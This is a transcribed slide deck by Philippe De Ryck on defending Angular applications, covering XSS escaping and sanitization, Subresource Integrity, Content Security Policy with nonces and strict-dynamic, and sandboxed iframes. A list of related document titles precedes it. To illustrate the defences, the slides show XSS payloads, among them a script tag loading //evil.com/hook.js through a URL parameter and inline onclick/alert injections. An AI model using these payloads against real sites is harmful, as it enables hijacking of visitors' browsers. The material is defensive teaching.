BOOSTING THE SECURITY

Similar documents
BOOSTING THE SECURITY OF YOUR ANGULAR 2 APPLICATION

CSP ODDITIES. Michele Spagnuolo Lukas Weichselbaum

Browser code isolation

MODERN WEB APPLICATION DEFENSES

Content Security Policy

Match the attack to its description:

Extending the browser to secure applications

Web Security: Vulnerabilities & Attacks

We will show you how we bypassed every XSS mitigation we tested. Mitigation bypass-ability via script gadget chains in 16 popular libraries

Defense-in-depth techniques. for modern web applications

HTTP Security Headers Explained

Modern client-side defenses. Deian Stefan

Code-Reuse Attacks for the Web: Breaking XSS mitigations via Script Gadgets

Web Security IV: Cross-Site Attacks

So we broke all CSPs. You won't guess what happened next!

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

High -Tech Bridge s Web Server Security Service API Developer Documentation Version v1.3 February 13 th 2018

Analysis of Hypertext Isolation Techniques for Cross-site Scripting Prevention. Mike Ter Louw Prithvi Bisht V.N. Venkatakrishnan

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Content Security Policy

Web basics: HTTP cookies

Web Security: Vulnerabilities & Attacks

Web basics: HTTP cookies

last time: command injection

Project 3 Web Security Part 1. Outline

Northeastern University Systems Security Lab

Client Side Injection on Web Applications

Writing Secure Chrome Apps and Extensions

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Sandboxing JavaScript. Lieven Desmet iminds-distrinet, KU Leuven OWASP BeNeLux Days 2012 (29/11/2012, Leuven) DistriNet

Security. CSC309 TA: Sukwon Oh

RKN 2015 Application Layer Short Summary

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

The Evolution of Chrome Security Architecture. Huan Ren Director, Qihoo 360 Technology Ltd

CS 161 Computer Security

CS 161 Computer Security

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Web Application Security

AN EVALUATION OF THE GOOGLE CHROME EXTENSION SECURITY ARCHITECTURE

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

Client Side Security And Testing Tools

Know Your Own Risks: Content Security Policy Report Aggregation and Analysis

Care & Feeding of Programmers: Addressing App Sec Gaps using HTTP Headers. Sunny Wear OWASP Tampa Chapter December

The security of Mozilla Firefox s Extensions. Kristjan Krips

CSP STS PKP SRI ETC OMG WTF BBQ

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild

Code-Injection Attacks in Browsers Supporting Policies. Elias Athanasopoulos, Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS

shortcut Tap into learning NOW! Visit for a complete list of Short Cuts. Your Short Cut to Knowledge

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin

Code Injection Attacks

WEB SECURITY: XSS & CSRF

Web Security, Part 2

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

Trusted Types - W3C TPAC

EasyCrypt passes an independent security audit

NoScript, CSP and ABE: When The Browser Is Not Your Enemy

UI Course HTML: (Html, CSS, JavaScript, JQuery, Bootstrap, AngularJS) Introduction. The World Wide Web (WWW) and history of HTML

Access Denied! Decoding Identity Aware Proxies

An Evaluation of the Google Chrome Extension Security Architecture

Manual Html A Href Onclick Submit Form

DID WE LOSE THE BATTLE FOR A SECURE WEB?

Some Facts Web 2.0/Ajax Security

CSC 482/582: Computer Security. Cross-Site Security

Riding out DOMsday: Toward Detecting and Preventing DOM Cross-Site Scripting. William Melicher Anupam Das Mahmood Sharif Lujo Bauer Limin Jia

Origin Policy Enforcement in Modern Browsers

CCSP: Controlled Relaxation of Content Security Policies by Runtime Policy Composition

October 08: Introduction to Web Security

Web Application with AJAX. Kateb, Faris; Ahmed, Mohammed; Alzahrani, Omar. University of Colorado, Colorado Springs

CIS 4360 Secure Computer Systems XSS

OWASP Top 10 The Ten Most Critical Web Application Security Risks

MASTERS COURSE IN FULL STACK WEB APPLICATION DEVELOPMENT W W W. W E B S T A C K A C A D E M Y. C O M

Web 2.0 Attacks Explained

CSC 405 Computer Security. Web Security

Secure Coding and Code Review. Berlin : 2012

Comprehensive AngularJS Programming (5 Days)

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

Information Security CS 526 Topic 11

CS Paul Krzyzanowski

Computer Security. 14. Web Security. Paul Krzyzanowski. Rutgers University. Spring 2018

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Reflected XSS Cross-Site Request Forgery Other Attacks

Etanova Enterprise Solutions

CSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno

Chrome Extension Security Architecture

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

Web Security, Summer Term 2012

Web Security, Summer Term 2012

ISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS. Waqas Nazir - CEO - DigitSec, Inc.

tostatichtml() for Everyone!

Full Stack Web Developer

HTML5 a clear & present danger

C1: Define Security Requirements

More attacks on clients: Click-jacking/UI redressing, CSRF

Evaluating the Security Risks of Static vs. Dynamic Websites


Beijing , China. Keywords: Web system, XSS vulnerability, Filtering mechanisms, Vulnerability scanning.

Extending the Web Security Model with Information Flow Control

About Me. Name: Jonathan Brown. Job: Full Stack Web Developer. Experience: Almost 3 years of experience in WordPress development

Policy Settings for Windows Server 2003 (including SP1) and Windows XP (including SP2)

JavaScript. Like PHP, JavaScript is a modern programming language that is derived from the syntax at C.

Transcription:

BOOSTING THE SECURITY OF YOUR ANGULAR APPLICATION Philippe De Ryck March 2017 https://www.websec.be

ANGULAR APPLICATIONS RUN WITHIN THE BROWSER JS code HTML code Load application JS code / HTML code JS code HTML code JS Application HTML Template Fetch data from API Raw data Data 2

ABOUT ME PHILIPPE DE RYCK My goal is to help you build secure web applications Hosted and customized in-house training Specialized security assessments of critical systems Threat landscape analysis and prioritization of security efforts More information and resources on https://www.websec.be My security expertise is broad, with a focus on Web Security PhD in client-side web security Main author of the Primer on client-side web security 3

CROSS-SITE SCRIPTING IN ANGULAR

CROSS-SITE SCRIPTING (XSS) In an XSS attack, malicious content is injected into your application s pages In the original XSS attacks, an attacker injected JavaScript code Today, injected content can be JavaScript, CSS, HTML, SVG, 5

THE TRUE POWER BEHIND XSS http://colesec.inventedtheinternet.com/beef-the-browser-exploitation-framework-project/ 6

TO TALK ABOUT THE FUTURE, WE MUST TALK ABOUT THE PAST <p>welcome <b><?php echo $username?></b></p> https://websec.be/?username=philippe <p>welcome <b>philippe</b></p> Welcome Philippe https://websec.be/?username=<blink>dude</blink> <p>welcome <b><blink>dude</blink></b></p> Welcome dude ng-be https://websec.be/?username=pwned<script src= //evil.com/hook.js ></script> <p>welcome <b>pwned<script src= //evil.com/hook.js ></script></b></p> Welcome pwned

TRADITIONAL XSS DEFENSES <p> Welcome <b><?php echo $username?></b> </p> <p> Welcome <b><?php echo htmlentities($username)?></b> </p> <p> Welcome <b><blink>dude</blink></b> </p> <script> var username = <?php echo $username?> ; </script> <p class= <?php echo $status?> > Welcome <b style= color: <?php echo $color?> ><?php echo $username?></b> </p>

DOESN T THIS LOOK FAMILIAR? https://xkcd.com/327/

SEPARATING DATA AND CODE WITH ANGULAR <p>welcome <b>{{username}}</b></p> https://websec.be/?username=<script>alert( no! </script> <p>welcome <b><bscript>alert( no! )</script& Welcome <script>alert( no! )</script> gt;</b></p> https://websec.be/?username=<blink>dude</blink> <p>welcome <b><blink>dude</blink></b></p> Welcome <blink>dude</blink>

BUT ANGULAR IS FLEXIBLE, AND ESCAPING IS NOT MANDATORY <p>welcome <b [innerhtml]= htmlsnippet ></b></p> htmlsnippet= <blink>dude</blink> <p>welcome <b><blink>dude</blink></b></p> Welcome dude ng-be htmlsnippet=pwned<script src= //evil.com/hook.js ></script> <p>welcome <b>pwned</b></p> Welcome pwned

RESPECT THE AUTHORITY OF THE SANITIZER Sanitization is enabled by default when you bind HTML into the DOM The majority of you will not even notice the sanitizer at work, which is great! Make sure you do this via Angular, not by directly calling the DOM API Similar to Angular 1, functions to bypass sanitization are available A minor modifications aims to raise developer awareness about its effect bypasssecuritytrusthtml() bypasssecuritytrustscript() bypasssecuritytruststyle() bypasssecuritytrusturl() bypasssecuritytrustresourceurl()

DISMISS XSS LIKE A KING, GET PWNED LIKE A SKIDDIE https://github.com/angular/angular/issues/8511 Redacted for your safety!

TAKEAWAY #1 ANGULAR ALREADY PROTECTS YOU AGAINST XSS, JUST GET OUT OF THE WAY The normal way of binding data is using interpolation Angular will automatically apply escaping Binding data this way will never result in the injection of unsafe content You can also bind data that contains HTML code Angular will automatically apply sanitization The sanitizer removes dangerous features, but leaves other parts untouched Do not directly use DOM APIs to bind this data, but use built-in mechanisms Angular allows you to mark a value as safe to use in a dangerous context Only use this for static data, which has been verified to be secure

BUT WHAT ABOUT UNTRUSTED CODE? Angular User Data Ads

KNOW WHAT YOU LOAD WITH SRI

HOW DO YOU KNOW WHAT CODE YOU LOAD? https://some-cdn.com/angular/2.0.0.js

SUBRESOURCE INTEGRITY Including code from third-party providers requires a lot of trust What if the provider gets compromised? What if the provider decides to change the code you are including? Subresource Integrity allows you to define what you want to include Developer specifies a checksum for a script or stylesheet inclusion Browser calculates and verifies the checksum before including the resource <script src= /angular.js integrity= sha384-li9v DqAJ crossorigin= anonymous > </script>

SRI IN ACTION <script src= https:// 2.0.0.js integrity= sha384-814a3 Yzi= crossorigin= anonymous > </script> Verify checksum https:// /2.0.0.js

ON A POSITIVE NOTE, MANY CDNS MAKE SRI REALLY EASY https://cdnjs.com/libraries/angular.js/

BUT DOING IT YOURSELF IS NOT VERY HARD https://www.srihash.org/

INTEGRATING SRI INTO YOUR BUILD PROCESS https://www.npmjs.com/package/webpack-subresource-integrity

WIDESPREAD BROWSER SUPPORT IS COMING http://caniuse.com/#search=sri

TAKEAWAY #2 SUBRESOURCE INTEGRITY GIVES YOU ASSURANCES ABOUT WHAT YOU LOAD SRI tells the browser to verify the integrity of scripts and styles Should be enabled for all your external resources Can be used to prevent unauthorized updates by third parties Add a fallback to load the resources from your own server if needed Detect whether a library is loaded or not, and load the fallback in case of emergency Trivial to enable for your own resources in your build process

GETTING BACK CONTROL WITH CSP

1-UPPING YOUR XSS DEFENSES WITH CSP Content Security Policy (CSP) is a new browser security policy Gives a developer a lot of control over what is allowed to happen in a page Delivered by the server in a response header or meta tag Content-Security-Policy: script-src self External scripts are only loaded if they are explicitly whitelisted <p>welcome <b>pwned<script src= //evil.com/hook.js ></script></b></p> Inline scripts are blocked and will not execute <p>welcome <b onclick= alert( XSS ) ><script>alert( XSS );</script></b></p>

CSP SOUNDS HARD, WILL IT WORK WITH ANGULAR? Content-Security-Policy: script-src self

WHITELISTING REMOTE SCRIPTS SEEMS EASY Content-Security-Policy: script-src self https://cdnjs.cloudflare.com

HOST-BASED WHITELISTING IS A BAD IDEA https://speakerdeck.com/mikispag/acm-ccs-2016-csp-is-dead-long-live-csp 29

NONCES TO THE RESCUE Content-Security-Policy: script-src self nonce-superrandom Nonces should fresh and random

NONCES WORK FOR INLINE SCRIPTS AS WELL Content-Security-Policy: script-src self nonce-superrandom Nonces should fresh and random

BUT INCLUDING REMOTE COMPONENTS REMAINS TRICKY Content-Security-Policy: script-src self nonce-superrandom https://platform.twitter.com/ https://cdn.syndication.twimg.com https://syndication.twitter.com

STRICT-DYNAMIC ENABLES TRUST PROPAGATION Content-Security-Policy: script-src self nonce-superrandom strict-dynamic

BACKWARDS COMPATIBILITY WITH STRICT-DYNAMIC Content-Security-Policy: object-src 'none'; script-src nonce-{random}' 'strict-dynamic' 'unsafe-inline' 'unsafe-eval' https: http:; report-uri https://your-report-collector.example.com/ Remote Inline Remote Inline Remote Inline Content-Security-Policy: object-src 'none'; script-src nonce-{random} 'strict-dynamic 'unsafe-eval'; report-uri https://your-report-collector.example.com/ Content-Security-Policy: object-src 'none'; script-src nonce-{random} 'unsafe-eval' https: http:; report-uri https://your-report-collector.example.com/ Content-Security-Policy: object-src 'none'; script-src 'unsafe-inline' 'unsafe-eval' https: http:; report-uri https://your-report-collector.example.com/

TAKEAWAY #3 CSP ALLOWS YOU TO LOCK YOUR APPLICATION DOWN CSP allows you to prevent injected scripts from being executed Straightforward if you do not depend on third-party resources Stick with strict whitelisting if possible Use strict-dynamic to enable trust propagation if needed CSPs reporting mode gives you insights into violations Awesome to dry-run a policy before actually deploying it CSP can be used to restrict other types of resources and actions New features keep being added, making CSP an important policy towards the future

SANDBOXING UNTRUSTED CODE

BUT WHAT IF YOU LIKE LIVING ON THE EDGE?

THE SANDBOX ATTRIBUTE Sandboxed iframe s are restricted by default Separate, unique origin No script execution No form submission No external navigations or popups No plugin content No fullscreen No autoplay <iframe src= sandbox > </iframe>

RELAXING THE SANDBOX Restrictions can be lifted by adding specific keywords E.g. allow-scripts, allow-same-origin, Some restrictions cannot be lifted Plugin content cannot be re-enabled Navigating arbitrary contexts is not allowed (only top-level or auxiliary) Enabling allow-scripts together with allow-same-origin is dangerous Allows the sandboxed script to break out of the sandbox <iframe src= sandbox= allow-scripts > </iframe>

USING THE SANDBOX IN PRACTICE <iframe [src]= sandboxroute sandbox= allow-scripts > </iframe> <iframe [src]= htmlfile sandbox > </iframe> <iframe [srcdoc]= sandboxhtml sandbox > </iframe>

COMMUNICATING WITH A SANDBOXED IFRAME

COMMUNICATING WITH A SANDBOXED IFRAME Sending a message to a sandboxed content requires the use of the wildcard origin Receiving a message requires careful verification of the sender origin

ALL BROWSERS PROVIDE A SANDBOXED IFRAME http://caniuse.com/#search=sandbox

TAKEAWAY #4 SANDBOXING IS A POWERFUL MECHANISM TO ISOLATE UNTRUSTED CODE Sandboxed iframes give you a strictly controlled environment A lot of potentially dangerous features are turned off Sandboxed iframes run in a unique origin by default Ideally suited to run untrusted code components Behavior can be controlled with a coarse granularity Turn features back on when needed Be careful about the code escaping the sandbox (same-origin and allow-scripts) Offloading Angular templates / components can be tricky Requires to bootstrap a new Angular context in the sandboxed context

TAKEAWAY #1 ANGULAR ALREADY PROTECTS YOU AGAINST XSS, JUST GET OUT OF THE WAY TAKEAWAY #2 SUBRESOURCE INTEGRITY GIVES YOU ASSURANCES ABOUT WHAT YOU LOAD TAKEAWAY #3 CSP ALLOWS YOU TO LOCK YOUR APPLICATION DOWN TAKEAWAY #4 SANDBOXING IS A POWERFUL MECHANISM TO ISOLATE UNTRUSTED CODE 45

NOW IT S UP TO YOU Secure Follow Share Web Security Essentials April 24 25, Leuven, Belgium https://essentials.websec.be https://www.websec.be philippe.deryck@cs.kuleuven.be /in/philippederyck

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback